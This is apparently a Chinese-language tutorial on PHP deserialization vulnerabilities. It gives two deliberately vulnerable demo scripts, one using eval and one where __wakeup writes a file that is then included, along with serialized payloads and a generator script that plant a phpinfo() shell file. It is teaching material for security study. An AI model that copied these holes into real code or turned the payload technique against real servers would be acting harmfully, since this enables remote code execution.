php序列化和反序列化
1.php序列化基本知识
1)php序列化和反序列化函数
2)php序列化字符串格式
2.php魔术方法
3.漏洞示例
1)字符型的反序列化
<?php
show_source(__FILE__);
$KEY = "test";
$str = $_GET['str'];
if (unserialize($str) === "$KEY")
{
eval('phpinfo();');
}
else
echo 'try it again';
?>
payload: ?str=s:4:"test"; #具体加不加;感觉有时候不确定
示例github地址:https://github.com/poemThesky/poemThesky.github.io/blob/81e37af083d62444a41bac00d693d113b23f3640/%E8%AF%BE%E4%BB%B6%E7%9B%B8%E5%85%B3%E4%BE%8B%E9%A2%98/php%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%AE%9E%E4%BE%8B1.php
2)调⽤ wakeup
<?php
show_source(__FILE__);
class test{
public $test;
function __wakeup(){
$fp = fopen("shell.php","w") ;
fwrite($fp,$this->test);
fclose($fp);
}
}
$class2 = $_GET['ser'];
print_r($class2);
echo "</br>";
$class2_unser = unserialize($class2);
@require "shell.php";
?>
payload脚本:O%3A4%3A%22test%22%3A1%3A%7Bs%3A4%3A%22test%22%3Bs%3A15%3A%22%3C%3F+phpinfo%28%29%3B%3F%3E%22%3B%7D
这里注意一个点,到底要不要url编码具体看题目,也许是浏览器版本有影响?
<?php
class test{
public $test="<? phpinfo();?>";
function __wakeup(){
$fp = fopen("shell.php","w") ;
fwrite($fp,$this->test);
fclose($fp);
}
}
$a = new test();
$b = serialize($a);
echo urlencode($b);
?>
github示例二地址:https://github.com/poemThesky/poemThesky.github.io/blob/7b729b7c329a1e447850b37f21704bc07f747104/%E8%AF%BE%E4%BB%B6%E7%9B%B8%E5%85%B3%E4%BE%8B%E9%A2%98/php-unserialize-demo2.php
githubpayload地址:https://github.com/poemThesky/poemThesky.github.io/blob/7b729b7c329a1e447850b37f21704bc07f747104/%E8%AF%BE%E4%BB%B6%E7%9B%B8%E5%85%B3%E4%BE%8B%E9%A2%98/php-unserialize-demo2-payload.php